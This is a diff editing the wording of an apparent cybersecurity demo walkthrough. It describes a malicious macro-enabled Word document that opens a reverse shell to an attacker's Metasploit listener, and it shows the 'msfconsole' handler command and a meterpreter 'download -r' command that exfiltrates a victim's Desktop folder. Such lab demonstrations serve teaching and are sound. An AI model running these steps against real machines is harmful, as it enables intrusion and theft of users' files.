EnricoPiccin02/Cybersecurity-Demo/home.md

 ```
 msfconsole -q -r handler.rc
 ```
-When the victim opens the `malicious.docm` document, the VBA Script will attempt to open a TCP connection to the adversary-controlled listener, by continuously migrating among processes running on the victim's machine, or by spawning new ones, until a TCP connection is successfully established.
+Upon the victim’s opening of the `malicious.docm` document, the VBA script will attempt to establish a TCP connection to the adversary-controlled listener by continuously migrating among processes running on the victim’s machine or spawning new ones until a successful connection is achieved.

 ![Photo of Mountain](images/mountain.jpg)

 <br/>

 ## Exfiltration
-From the remote shell client, the adversary can now move around the victim's File System.
-Depending on the **privilege level** and **access rights** the adversary is capable of acquiring on the victim's environment, the attacker might not be able to access all resources.
-I assumed that critical resources where inside the `C:\Users\enrico\Desktop\Very_Important_Stuff\` directory, so the adversary can exfiltrate them by executing the following command:
+From the remote shell client, the adversary can now navigate the victim’s File System.
+Depending on the **privilege level** and **access rights** the adversary is capable of acquiring on the victim's environment, the attacker may not be able to access all resources.
+I assumed that critical resources were located within the `C:\Users\enrico\Desktop\Very_Important_Stuff\` directory, so the adversary could exfiltrate them by executing the following command:
 ```
 download -r C:\\Users\\enrico\\Desktop\\Very_Important_Stuff\\ /home/kali/Desktop/Exfiltrated
 ```